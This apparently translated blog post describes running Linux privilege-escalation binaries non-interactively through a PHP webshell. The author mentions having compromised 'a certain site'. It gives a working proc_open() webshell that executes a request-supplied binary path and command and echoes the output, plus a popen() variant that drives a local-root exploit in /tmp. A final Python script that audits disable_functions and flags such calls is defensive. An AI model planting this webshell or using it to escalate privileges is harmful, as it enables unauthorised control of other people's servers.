Detailed explanation of non-interactive options under Linux

  • 2020-05-27 07:56:47
  • OfStack

preface

After I got a webshell on a certain site some time ago, I found that the site could not get a reverse shell back when I escalated privileges. Also, when you are doing penetration testing, you often run into cases where no reverse shell comes back, and you cannot tell whether the privilege escalation succeeded because there is no interactive environment. So I wrote a simple tool. Friends who need it can refer to it for study.

The method is as follows

proc_open()


<?php
// $path is the absolute path of the privilege-escalation tool, e.g. /usr/local/htdocs/2.6.18
// $cmd is the command you need to execute, e.g. whoami
if (isset($_GET['path']) && isset($_GET['cmd'])) {
    $path = $_GET['path'];
    $cmd  = $_GET['cmd'];
    // stdin is a pipe the script writes to; stdout and stderr are pipes it reads from
    $descriptorspec = array(
        0 => array("pipe", "r"),
        1 => array("pipe", "w"),
        2 => array("pipe", "w")
    );
    $process = proc_open($path, $descriptorspec, $pipes);

    if (is_resource($process)) {
        // hand the command to the tool on its stdin, then collect whatever it printed
        fwrite($pipes[0], $cmd);
        fclose($pipes[0]);
        echo stream_get_contents($pipes[1]);
        echo stream_get_contents($pipes[2]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        $return_value = proc_close($process);
    }
}

The code is very simple. If you don't understand it, you can read the PHP manual. popen() can achieve the same effect here.

In addition, once we have this code, we can upload the privilege-escalation tool directly to the server, and then modify the PHP code to test which tool works.

popen()

This was posted by someone on toast before, and the code is left unchanged below. A slight change will achieve the above effect.


<?php
$sucommand = "/tmp/2.6.18-2011";                    // path of the privilege-escalation binary
$fp = popen($sucommand, "w");                       // open it with a writable pipe to its stdin
fputs($fp, "echo 22222 > /tmp/sbsbsbsbsbsb11111");  // the command the tool should run
pclose($fp);
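As an added example (not the author's code), the following Python script covers the defending side of both snippets above: it checks whether a php.ini disable_functions list actually covers popen() and proc_open(), the two functions the proc_open() and popen() sections rely on, and it runs a crude scan that flags PHP sources where such a function is called on a request-controlled path, the pattern of the proc_open() snippet. The php.ini excerpts and PHP sources are constructed samples.

```python
import re

# Process-spawning PHP functions; popen() and proc_open() are the two used above.
PROCESS_FUNCS = {"exec", "passthru", "system", "shell_exec", "popen",
                 "proc_open", "pcntl_exec"}
SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER|FILES)\b"

def uncovered_process_funcs(php_ini_text):
    """Return the PROCESS_FUNCS that an (uncommented) disable_functions
    directive does NOT list; an empty set means all of them are blocked."""
    disabled = set()
    for line in php_ini_text.splitlines():
        m = re.match(r"\s*disable_functions\s*=\s*(.*)$", line)
        if m:
            disabled |= {f.strip().lower() for f in m.group(1).split(",") if f.strip()}
    return PROCESS_FUNCS - disabled

def find_tainted_spawns(php_src):
    """Flag PROCESS_FUNCS calls whose first argument is a request superglobal
    or a variable assigned from one anywhere in the file (no flow analysis,
    so this is a triage aid, not a proof)."""
    tainted = set(re.findall(r"(\$\w+)\s*=\s*" + SUPERGLOBAL, php_src))
    call = r"\b(" + "|".join(sorted(PROCESS_FUNCS)) + r")\s*\(\s*([^,)]+)"
    hits = []
    for m in re.finditer(call, php_src):
        func, arg = m.group(1), m.group(2).strip()
        if arg in tainted or re.match(SUPERGLOBAL, arg):
            hits.append((func, arg))
    return hits

# Constructed samples: a blocklist that forgets popen/proc_open, and a complete one.
WEAK_INI = ";disable_functions = proc_open\ndisable_functions = exec,passthru,shell_exec,system\n"
HARDENED_INI = ("disable_functions = exec,passthru,system,shell_exec,popen,"
                "proc_open,pcntl_exec\n")
# Constructed PHP: the proc_open() snippet's pattern vs. a fixed path as in the popen() one.
WEBSHELL_SRC = ("<?php $path = $_GET['path']; $cmd = $_GET['cmd'];\n"
                "$p = proc_open($path, $spec, $pipes); fwrite($pipes[0], $cmd);\n")
STATIC_SRC = '<?php $su = "/tmp/2.6.18-2011"; $fp = popen($su, "w");\n'

if __name__ == "__main__":
    print("weak php.ini leaves enabled:", sorted(uncovered_process_funcs(WEAK_INI)))
    print("hardened php.ini leaves enabled:", sorted(uncovered_process_funcs(HARDENED_INI)))
    print("tainted spawn calls:", find_tainted_spawns(WEBSHELL_SRC), find_tainted_spawns(STATIC_SRC))
```

A disable_functions list that names only exec and system leaves popen() and proc_open() available, which is exactly the gap both snippets use.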

conclusion